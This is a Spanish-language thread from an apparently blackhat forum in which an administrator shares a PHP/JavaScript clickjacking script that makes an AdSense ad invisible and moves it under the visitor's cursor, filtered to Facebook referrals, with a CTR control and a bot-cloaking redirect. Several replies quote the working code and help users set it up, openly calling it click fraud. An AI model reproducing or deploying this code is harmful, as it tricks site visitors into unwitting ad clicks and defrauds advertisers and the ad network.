• 18 voto(s) - 4.78 Media
  • 5
  • 4
  • 3
  • 2
  • 1
Modos de tema

Codigo ocultar anuncios adsense
Exkanon Offline
Desarrollador Web
*******
Administrators

Mensajes: 742
Temas: 55
Registro en: Dec 2015
Reputación: 56
Gracias: 3
345 Gracias recividas en 25 post(s)
este codigo hace que el anuncio sea invisible y siga al mouse.
tiene un filtro que hace que solo funcione a visitantes que solo vengan de facebook.com ,  bien lo puedes modificar a tu gusto.
tambien tiene un control de CTR que puedes modificar a tu gusto.
Necesitas estar registrado para ver estoSolo los usuarios registrados pueden ver el contenido. - Porfavor y da "Gracias" al post para ver su contenido.
Porque aún falta mucho por recorrer. 

Brandom Offline

BlackHaters

Mensajes: 33
Temas: 4
Registro en: Jan 2016
Reputación: 0
Gracias: 0
0 Gracias recividas en 0 post(s)
Excelente aporte @Exkanon.

Me podrías decir a la hora de usar el PHPCode Snippets, donde me indica el Tracking(Nombre de seguimiento) Que debería poner?

Saludos

Exkanon Offline
Desarrollador Web
*******
Administrators

Mensajes: 742
Temas: 55
Registro en: Dec 2015
Reputación: 56
Gracias: 3
345 Gracias recividas en 25 post(s)
(01-08-2016, 02:03 PM)Brandom escribió: Excelente aporte @Exkanon.

Me podrías decir a la hora de usar el PHPCode Snippets, donde me indica el Tracking(Nombre de seguimiento) Que debería poner?

Saludos

Donde sale eso del tranking ?
Porque aún falta mucho por recorrer. 

Exkanon Offline
Desarrollador Web
*******
Administrators

Mensajes: 742
Temas: 55
Registro en: Dec 2015
Reputación: 56
Gracias: 3
345 Gracias recividas en 25 post(s)
(01-08-2016, 02:03 PM)Brandom escribió: Excelente aporte @Exkanon.

Me podrías decir a la hora de usar el PHPCode Snippets, donde me indica el Tracking(Nombre de seguimiento) Que debería poner?

Saludos

hay pones cualquier cosa como "ADS"o lo que se te ocurra es el nombre que le asignamos al short code para hacer llamar al script.
Porque aún falta mucho por recorrer. 

Brandom Offline

BlackHaters

Mensajes: 33
Temas: 4
Registro en: Jan 2016
Reputación: 0
Gracias: 0
0 Gracias recividas en 0 post(s)
(01-08-2016, 10:39 PM)Exkanon escribió:
(01-08-2016, 02:03 PM)Brandom escribió: Excelente aporte @Exkanon.

Me podrías decir a la hora de usar el PHPCode Snippets, donde me indica el Tracking(Nombre de seguimiento) Que debería poner?

Saludos

hay pones cualquier cosa como "ADS"o lo que se te ocurra es el nombre que le asignamos al short code para hacer llamar al script.

Me pregunto como integro el bloque de adsense en el script de ocultar el código porque puedo ver que el bloque se encuentra dentro del script acompañado por el comando de "Echo"

A esto me refiero..

</style>";
echo "<div id=\"clickjack\">";
echo "<a href=\"#\" onclick=\"getValue()\">\n";
echo "</a>\n";
echo "<div class='cfmonitor'>\n";
echo "<script async src=\"//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js\"></script>\n";
echo "<!-- nombre -->\n";
echo "<ins class=\"adsbygoogle\"\n";
echo "style=\"display:inline-block;width:336px;height:280px\"\n";
echo "data-ad-client=\"ca-pub-xxxxxxxxxxxxx\"\n";
echo "data-ad-slot=\"xxxxxxxxx\"></ins>\n";
echo "<script>\n";
echo "(adsbygoogle = window.adsbygoogle || []).push({});\n";
echo "</script>\n";
echo "</div>";
echo "<script type=\"text/javascript\">\n";
echo "var div = document.getElementById('clickjack');\n";
echo "document.addEventListener('mousemove',function(e) { \n";
echo "div.style.left = e.pageX -280 +\"px\";\n";
echo "div.style.top = e.pageY -360 +\"px\";\n";
echo "});\n";
echo "</script>\n";
echo "</div>";
}
?>

No lo cito porque no sale la opción de citaros.

Exkanon Offline
Desarrollador Web
*******
Administrators

Mensajes: 742
Temas: 55
Registro en: Dec 2015
Reputación: 56
Gracias: 3
345 Gracias recividas en 25 post(s)
(01-08-2016, 10:53 PM)Brandom escribió: Me pregunto como integro el bloque de adsense en el script de ocultar el código porque puedo ver que el bloque se encuentra dentro del script acompañado por el comando de "Echo"

A esto me refiero..

</style>";
echo "<div id=\"clickjack\">";
echo "<a href=\"#\" onclick=\"getValue()\">\n";
echo "</a>\n";
echo "<div class='cfmonitor'>\n";
echo "<script async src=\"//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js\"></script>\n";
echo "<!-- nombre -->\n";
echo "<ins class=\"adsbygoogle\"\n";
echo "style=\"display:inline-block;width:336px;height:280px\"\n";
echo "data-ad-client=\"ca-pub-xxxxxxxxxxxxx\"\n";
echo "data-ad-slot=\"xxxxxxxxx\"></ins>\n";
echo "<script>\n";
echo "(adsbygoogle = window.adsbygoogle || []).push({});\n";
echo "</script>\n";
echo "</div>";
echo "<script type=\"text/javascript\">\n";
echo "var div = document.getElementById('clickjack');\n";
echo "document.addEventListener('mousemove',function(e) { \n";
echo "div.style.left = e.pageX -280 +\"px\";\n";
echo "div.style.top = e.pageY -360 +\"px\";\n";
echo "});\n";
echo "</script>\n";
echo "</div>";
}
?>

No lo cito porque no sale la opción de citaros.

solo tienes que cambiar las x por tus ID de adsense y el bloque de anuncio , me refiero a estos

Código PHP:
echo "data-ad-client=\"ca-pub-xxxxxxxxxxxxx\"\n";
echo 
"data-ad-slot=\"xxxxxxxxx\"></ins>\n"
Porque aún falta mucho por recorrer. 

patonunez Offline

BlackHaters

Mensajes: 73
Temas: 1
Registro en: Dec 2015
Reputación: 0
Gracias: 0
0 Gracias recividas en 0 post(s)
amigo sabes que hago el cambio del ca pub y del ad slot, ademas de cambiar el nombre en el codigo que posteas pero aún asi, al colocar el short code que me da el plugin ejemplo "[xyz-ips snippet="mesothelioma"]" y al hacer click en la pagina no aparece nada
tampoco en el click fraud :/

Exkanon Offline
Desarrollador Web
*******
Administrators

Mensajes: 742
Temas: 55
Registro en: Dec 2015
Reputación: 56
Gracias: 3
345 Gracias recividas en 25 post(s)
(01-10-2016, 02:53 PM)patonunez escribió: amigo sabes que hago el cambio del ca pub y del ad slot, ademas de cambiar el nombre en el codigo que posteas pero aún asi, al colocar el short code que me da el plugin ejemplo "[xyz-ips snippet="mesothelioma"]" y al hacer click en la pagina no aparece nada
tampoco en el click fraud :/

recuerda estar probando el script entrando desde el fb o el referal que pusiste, si no algo estas asiendo mal.
Porque aún falta mucho por recorrer. 

patonunez Offline

BlackHaters

Mensajes: 73
Temas: 1
Registro en: Dec 2015
Reputación: 0
Gracias: 0
0 Gracias recividas en 0 post(s)
(01-10-2016, 03:18 PM)Exkanon escribió: recuerda estar probando el script entrando desde el fb o el referal que pusiste, si no algo estas asiendo mal.

y como se une correctamente al codigo para ocultar de bots? porque ya hice funcionar el codigo oculto, pero no puedo hacerlo con el del bot, me podrias poner una captura de la forma correcta como hacerlo? gracias amigo!

youcarrie12 Offline

BlackHaters

Mensajes: 126
Temas: 2
Registro en: Jan 2016
Reputación: 0
Gracias: 0
1 Gracias recividas en 1 post(s)
(01-10-2016, 10:03 PM)patonunez escribió:
(01-10-2016, 03:18 PM)Exkanon escribió: recuerda estar probando el script entrando desde el fb o el referal que pusiste, si no algo estas asiendo mal.

y como se une correctamente al codigo para ocultar de bots? porque ya hice funcionar el codigo oculto, pero no puedo hacerlo con el del bot, me podrias poner una captura de la forma correcta como hacerlo? gracias amigo!

Hola en el script de ocultar contenido simplemente debes meter el codigo del ads oculto en esta linea que te dejo abajo.
{
echo "<meta http-equiv=\"Refresh\" content=\"0;url=http://foroinner.com\">";
}
Saludos!

patonunez Offline

BlackHaters

Mensajes: 73
Temas: 1
Registro en: Dec 2015
Reputación: 0
Gracias: 0
0 Gracias recividas en 0 post(s)
gracias amigo me aclaraste la duda!


Posibles temas similares...
Tema / Autor Respuestas / Vistas Último mensaje
4 Replies 548 Views
Último mensaje by kaizo
02-22-2017, 04:59 AM
1 Replies 200 Views
Último mensaje by treyfas
01-10-2017, 06:29 PM
2 Replies 364 Views
Último mensaje by djkevin
12-29-2016, 04:58 PM
88 Replies 10,069 Views
Último mensaje by anthoni809
12-03-2016, 08:16 PM
28 Replies 4,017 Views
Último mensaje by u5880369
10-24-2016, 06:57 AM
17 Replies 2,845 Views
Último mensaje by carloshx
10-09-2016, 06:22 PM




Usuarios navegando en este tema: 1 invitado(s)